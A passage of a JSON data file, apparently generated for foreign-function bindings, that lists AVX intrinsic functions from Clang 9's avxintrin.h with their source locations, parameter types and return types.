"inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_undefined_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3594:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3621:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_set_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3660:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__e", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__f", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__g", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__h", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_set_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3692:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i0", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i1", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i2", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i3", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i4", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i5", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i6", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i7", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3740:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w15", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w14", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w13", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w12", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w11", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w10", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w09", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w08", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w07", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w06", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w05", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w04", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w03", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w02", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w01", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w00", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3823:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b31", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b30", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b29", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b28", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b27", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b26", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b25", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b24", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b23", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b22", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b21", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b20", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b19", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b18", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b17", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b16", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b15", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b14", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b13", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b12", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b11", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b10", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b09", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b08", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b07", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b06", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b05", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b04", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b03", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b02", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b01", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b00", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set_epi64x", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3858:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_setr_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3887:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_setr_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3927:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__e", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__f", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__g", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__h", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_setr_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3959:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i0", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i1", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i2", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i3", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i4", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i5", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i6", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i7", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_setr_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4007:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w15", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w14", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w13", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w12", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w11", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w10", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w09", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w08", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w07", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w06", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w05", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w04", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w03", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w02", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w01", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w00", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_setr_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4092:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b31", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b30", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b29", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b28", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b27", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b26", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b25", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b24", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b23", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b22", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b21", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b20", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b19", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b18", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b17", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b16", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b15", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b14", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b13", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b12", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b11", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b10", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b09", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b08", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b07", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b06", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b05", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b04", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b03", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b02", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b01", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b00", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_setr_epi64x", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4125:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set1_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_set1_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4163:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4182:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4218:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_set1_epi64x", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4239:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__q", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_setzero_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_setzero_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4268:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_setzero_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4281:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_castpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4299:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_castpd_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4316:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_castps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4333:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_castps_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_castsi256_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4367:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_castsi256_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4384:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_castpd256_pd128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4401:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_castps256_ps128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4418:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_castsi256_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4434:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_castpd128_pd256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4455:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_castps128_ps256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4476:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_castsi128_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4495:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_zextpd128_pd256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4514:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_zextps128_ps256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_zextsi128_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4550:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_loadu2_m128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4774:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__addr_hi", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__addr_lo", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_loadu2_m128d", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4802:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__addr_hi", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__addr_lo", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_loadu2_m128i", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4827:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__addr_hi", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }, { "tag": "parameter", "name": "__addr_lo", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_storeu2_m128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4853:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__addr_hi", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__addr_lo", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu2_m128d", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4882:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__addr_hi", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__addr_lo", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu2_m128i", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4911:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__addr_hi", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }, { "tag": "parameter", "name": "__addr_lo", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_set_m128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4937:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__hi", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__lo", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_set_m128d", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4958:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__hi", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__lo", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_set_m128i", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:4978:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__hi", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__lo", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_setr_m128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:5001:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__lo", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__hi", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", 